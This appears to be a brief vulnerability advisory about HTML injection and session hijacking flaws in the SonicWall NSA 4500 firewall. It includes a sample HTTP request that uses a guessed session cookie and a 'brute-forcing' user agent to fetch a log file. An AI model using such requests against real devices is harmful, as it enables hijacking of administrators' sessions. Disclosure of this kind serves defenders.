SonicWall NSA 4500 HTML Injection and Session Hijacking Vulnerabilities

SonicWall NSA 4500 HTML Injection and Session Hijacking Vulnerabilities

An attacker can exploit these issues through a browser:

The following sample cookie request for the session-hijacking vulnerability is available:

GET /log.wri HTTP/1.0
Host: 123.123.123.123
Connection: close
User-Agent: brute-forcing
Cookie: SessId=111111111